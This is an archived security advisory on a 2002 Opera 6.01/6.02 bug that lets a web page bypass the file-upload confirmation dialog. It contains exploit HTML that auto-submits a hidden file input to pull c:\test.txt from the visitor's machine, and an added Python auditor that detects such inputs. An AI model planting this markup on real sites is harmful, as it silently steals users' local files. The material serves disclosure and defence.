30th May 2002 [SBWID-5381]
COMMAND
Opera permits unwanted local file upload
SYSTEMS AFFECTED
Opera 6.01 on Windows platforms. Opera 6.02 on Windows platforms.
PROBLEM
In GreyMagic Security Advisory GM#001-OP
[http://sec.greymagic.com/adv/gm001-op/]
Opera, like all browsers today, supports the <input type="file">
element, which is a standard method for users to upload files to HTTP
servers. Since the file element is a very security-sensitive element,
most web browsers do not allow its "value" attribute to be set (it is
read-only). If it were possible to assign an arbitrary string to the
"value" attribute, an attacking server could fetch any local file by
simply submitting a form (through scripting or social engineering, if
scripting has been disabled).
Opera's approach to the file element is a little different. The
"value" attribute can be set, but before the form it resides in is
submitted, a dialog comes up with the following warning: "The files
listed below have been selected, without your intervention, to be sent
to another computer. Do you want to send these files?"
Discussion
==========
It is possible to bypass the file element's confirmation dialog, which
means an attacker can download any file from an unsuspecting Opera
user.
By appending a simple " " (HTML entity, which represents the
ASCII code for a new-line character) to the end of the file element's
"value" attribute, Opera's security algorithm is fooled into thinking
that no files were assigned. Therefore, the warning dialog doesn't
come up; Opera simply submits the form with the desired file chosen by
an attacker.
Surprisingly, versions of Opera prior to 6.01 are not vulnerable to
this attack, so a change that occurred between version 6.0 and 6.01 is
the culprit. This also means that all of the non-Windows versions are
safe (Opera has not yet released 6.01 for other platforms).
Exploit
=======
This exploit will automatically transfer the file "c:/test.txt" to an
attacking host, which can handle it using a server-side environment
such as ASP, PHP or other solutions. It does not require any user
interaction:
<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php" name="secForm">
<input type="file" name="expFile" value="c:\test.txt " style="visibility:hidden">
</form>
</body>
</form>
</body>
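Added example, not part of the GreyMagic advisory: a content filter or page auditor can flag the pattern described above, since a legitimate page has no reason to ship a file input with a preset "value". The function names, field names and sample markup below are constructed for illustration.

```python
from html.parser import HTMLParser


class FileInputAuditor(HTMLParser):
    """Collects <input type="file"> elements that arrive with a preset value."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._form = None  # attributes of the enclosing <form>, if any

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases names and decodes character references in
        # attribute values, so entity-encoded characters are seen decoded.
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = a
        elif tag == "input" and a.get("type", "").strip().lower() == "file":
            value = a.get("value", "")
            if value:
                style = a.get("style", "").replace(" ", "").lower()
                self.findings.append({
                    "line": self.getpos()[0],
                    "name": a.get("name", ""),
                    "value": value,
                    # Whitespace (space, tab, new-line) after the path
                    "trailing_whitespace": value != value.rstrip(),
                    "hidden": "visibility:hidden" in style or "display:none" in style,
                    "form_action": (self._form or {}).get("action", ""),
                })

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit_html(markup):
    """Return one finding per file input that carries a preset value."""
    auditor = FileInputAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


# Constructed sample pages (not taken from the advisory)
SAMPLE_PRESET = """<body>
<form method="post" enctype="multipart/form-data" action="upload.example" name="f">
<input type="file" name="doc" value="c:/example/notes.txt " style="visibility:hidden">
</form>
</body>"""
SAMPLE_CLEAN = '<form method="post" action="/upload"><input type="file" name="doc"></form>'
```
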
SOLUTION
Upgrade to version 6.03